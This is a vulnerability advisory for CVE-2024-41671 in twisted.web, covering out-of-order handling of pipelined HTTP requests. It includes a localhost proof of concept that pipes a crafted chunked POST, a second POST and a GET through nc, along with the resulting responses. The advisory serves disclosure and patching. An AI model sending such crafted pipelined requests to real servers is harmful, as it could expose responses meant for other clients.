logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-41671 twisted

Package

Manager: pip
Name: twisted
Vulnerable Version: >=0 <24.7.0rc1

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

EPSS: 0.00066 pctl0.20919

Details

twisted.web has disordered HTTP pipeline response ### Summary The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. ### PoC 0. Start a fresh Debian container: ```sh docker run --workdir /repro --rm -it debian:bookworm-slim ``` 1. Install twisted and its dependencies: ```sh apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages . ``` 2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following: ```python from twisted.web import server, resource from twisted.internet import reactor class TheResource(resource.Resource): isLeaf = True def render_GET(self, request) -> bytes: return b"GET" def render_POST(self, request) -> bytes: return b"POST" site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run() ``` 3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection: ```sh (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80 ``` 4. Observe that the responses arrive out of order: ``` HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html POST ``` ### Impact See [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

Metadata

Created: 2024-07-29T16:33:11Z
Modified: 2024-11-18T16:26:56Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c8m8-j448-xjx7/GHSA-c8m8-j448-xjx7.json
CWE IDs: ["CWE-444"]
Alternative ID: GHSA-c8m8-j448-xjx7
Finding: F110
Auto approve: 1